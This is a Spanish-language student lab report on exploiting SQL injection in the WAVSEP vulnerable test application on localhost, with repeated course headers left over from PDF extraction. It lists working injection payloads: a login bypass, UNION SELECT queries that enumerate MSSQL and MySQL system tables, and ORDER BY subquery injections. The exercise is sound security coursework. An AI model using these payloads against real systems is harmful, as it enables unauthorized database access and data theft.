Eglain Antonio Mena EXPLOTACIÓN DE VULNERABILIDADES SQLI
Eglain Antonio Mena EXPLOTACIÓN DE VULNERABILIDADES SQLI
Eglain Antonio Mena EXPLOTACIÓN DE VULNERABILIDADES SQLI
PRESENTADO POR
EGLAIN ANTONIO MENA LEMOS
1. INTRODUCCIÓN
Como primero se instaló el Sistema Gestor de Base de Datos SGBD MYSQL, con el objetivo
principal de Explotar vulnerabilidades que afectan a sus bases de datos y poder auditar la
seguridad e implementar una guía de seguridad de la misma, con el uso de las buenas
prácticas de seguridad
Password: toor
bases de datos creadas
Configuración correcta.
Asignatura Datos del alumno Fecha
Apellidos: Mena Lemos
Seguridad en Bases
de Datos y
05/01/2019
Almacenamiento de
Nombre: Eglain Antonio
Datos Masivos
Las páginas en esta sección solo deben contener vulnerabilidades detectables por escáneres
pasivos.
Para realizar la explotación de los siguientes 3 casos, según la actividad propuesta por el
docente, se acceder al siguiente enlace, que es en donde se encuentra el *.jsp referenciado:
Asignatura Datos del alumno Fecha
Apellidos: Mena Lemos
Seguridad en Bases
de Datos y
05/01/2019
Almacenamiento de
Nombre: Eglain Antonio
Datos Masivos
http://localhost:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-
POST-200Error/index.jsp
Asignatura Datos del alumno Fecha
Apellidos: Mena Lemos
Seguridad en Bases
de Datos y
05/01/2019
Almacenamiento de
Nombre: Eglain Antonio
Datos Masivos
En este tipo de caso, lo que se refleja es la manera de vulnerar inyectando caracteres en los
campos de nombre de usuario y contraseña, como se puede evidenciar en los siguientes
exploit.
En cada caso del método de ataque, se puede visualizar que los Exploit mencionados en el
apartado funciona correctamente para la respectiva inyección.
Asignatura Datos del alumno Fecha
Apellidos: Mena Lemos
Seguridad en Bases
de Datos y
05/01/2019
Almacenamiento de
Nombre: Eglain Antonio
Datos Masivos
En este tipo de caso, lo que se refleja es la manera de vulnerar inyectando una sentencia en
SQL como es la Union y conservando la estructura del mensaje de los caracteres en el
campo designado para el mensaje, como se puede evidenciar en los siguientes exploit.
' UNION SELECT [int], [string], [string] FROM [table] [comment mark][space]
Exploit: 'or'7'='7
MSSQL Exploit: ' UNION SELECT id, name, 'jfks' FROM sysobjects--
MySQL Exploit: ' UNION SELECT 1, table_name, 'jfks' FROM
information_schema.tables--
MySQL Exploit (No Comments): ' UNION SELECT 1, table_name, 'jfks' FROM
information_schema.tables WHERE table_name like'%
Asignatura Datos del alumno Fecha
Apellidos: Mena Lemos
Seguridad en Bases
de Datos y
05/01/2019
Almacenamiento de
Nombre: Eglain Antonio
Datos Masivos
Inyección en una cláusula orden por en el alcance de una consulta dentro de una página de
búsqueda con respuestas erróneas que tiene que ver con sentencias de tipo order by.
A single result in the subquery (or none) will not cause a runtime exception, more will
MSSQL Exploit: (SELECT 1 FROM sysobjects WHERE name like'sysusers')--
MySQL Exploit (No Comments): (SELECT 1 FROM information_schema.`TABLES`
WHERE TABLE_NAME like'FILES')
Asignatura Datos del alumno Fecha
Apellidos: Mena Lemos
Seguridad en Bases
de Datos y
05/01/2019
Almacenamiento de
Nombre: Eglain Antonio
Datos Masivos